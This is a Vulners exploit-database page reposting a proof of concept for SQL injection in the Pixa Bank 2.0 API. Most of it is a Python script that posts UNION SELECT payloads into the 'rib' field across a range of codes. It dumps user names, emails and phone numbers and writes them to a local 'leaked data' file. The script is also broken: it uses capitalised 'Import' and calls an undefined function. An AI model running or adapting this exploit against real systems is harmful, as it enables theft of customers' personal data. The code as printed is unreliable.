Vulners
Lucene search
📄 Pixa Bank 2.0 SQL Injection
==================================================================================================================================
| # Title : Pixa Bank 2.0 – API SQL Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://pixastudio.com/ |
==================================================================================================================================
[+] Summary : This Python script is used to test and extract data from an API by repeatedly sending requests containing SQL injection payloads into a numeric input field.
It attempts to exploit a potential server vulnerability to extract user information such as name, email address, and phone number from the database.
If the query is successful, the extracted data is displayed and saved to a local text file.
It also includes an additional validation mode to send normal requests and detect valid code within the system.
[+] POC :
Import requests
Import urllib3
Import json
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
URL = "https://127.0.0.1/api/agence-ajax.php"
HEADERS = {
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 indoushka_CORE'
}
def sangrava_miner():
print("[*] Starting the comprehensive data extraction process (indoushka version)...")
print("-" * 60)
for code in range(400, 900):
sql_payload = f"{code}' UNION SELECT GROUP_CONCAT(nom, 0x7c, email, 0x7c, tel) FROM users-- -"
try:
res = requests.post(URL, headers=HEADERS, data={'rib': sql_payload}, verify=False, timeout=5)
if res.status_code == 200:
data = res.json()
if data.get("error") == "N" and data.get("agence"):
extracted_info = data.get("agence")
print(f"[!] Data extracted from {code}:")
print(f" => {extracted_info}")
with open("indoushka_leaked_data.txt", "a", encoding="utf-8") as f:
f.write(f"Code {code}: {extracted_info}\n")
else:
normal_rib= f"00100{code:03d}030030018036"
res_normal= requests.post(URL, headers=HEADERS, data={'rib': normal_rib}, verify=False)
if res_normal.json().get("error") == "N":
print(f"[+] Normal Agency Revealed: {code} | {res_normal.json().get('agence')}")
except Exception as e:
continue
if __name__ == "__main__":
indoushka_miner()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 May 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9